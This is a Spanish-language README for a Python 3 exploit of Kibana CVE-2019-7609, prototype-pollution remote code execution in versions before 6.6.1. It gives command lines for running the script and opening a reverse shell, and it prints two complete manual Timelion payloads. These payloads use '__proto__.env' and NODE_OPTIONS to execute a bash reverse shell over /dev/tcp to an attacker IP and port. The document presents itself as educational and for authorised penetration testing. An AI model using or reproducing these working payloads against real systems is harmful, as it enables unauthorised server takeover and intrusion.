
Exploit en Python para Kibana CVE-2019-7609 de ejecución remota de código mediante contaminación de prototipos (prototype pollution). Detecta automáticamente versiones vulnerables, verifica el fallo y opcionalmente abre una shell inversa.
Autor: LandGrey (Readaptación a Python3 por [Tu Nombre])
Referencia: Exploit-DB 46651
CVE: CVE-2019-7609
⚠️ Aviso:
Este script es solo para fines educativos y pruebas de penetración autorizadas. No lo uses en sistemas que no poseas o para los que no tengas permiso explícito. El autor y los colaboradores no son responsables por el mal uso o daño causado por esta herramienta.
Este es un script de exploit en Python 3 para la vulnerabilidad de Ejecución Remota de Código en versiones de Kibana < 6.6.1. Aprovecha una falla de contaminación de prototipos para ejecutar comandos arbitrarios, incluyendo generar una shell inversa, en una instancia vulnerable de Kibana.
python3 kibana_exploit.py -u http://target-kibana:5601
Para desencadenar una shell inversa:
python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT
python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444
requestspackagingInstala las dependencias con:
pip install requests packaging
También puedes explotar esta vulnerabilidad manualmente usando el visualizador Timelion de Kibana:
Payload por securityMB:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Payload por chybeta:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Reemplaza 192.168.1.100 y 4444 con tu propia IP y puerto de listener.
El script proporciona una salida clara y paso a paso para la detección, verificación y explotación, haciendo que sea fácil de seguir y divertido de usar!
Este script es una excelente manera de aprender sobre contaminación de prototipos, ejecución remota de código y técnicas de pruebas de penetración. ¡Úsalo de manera responsable y siempre con permiso!
Este proyecto es solo para uso educativo. Sin garantía, sin compromisos. Hackea éticamente, mantén la curiosidad y ¡diviértete!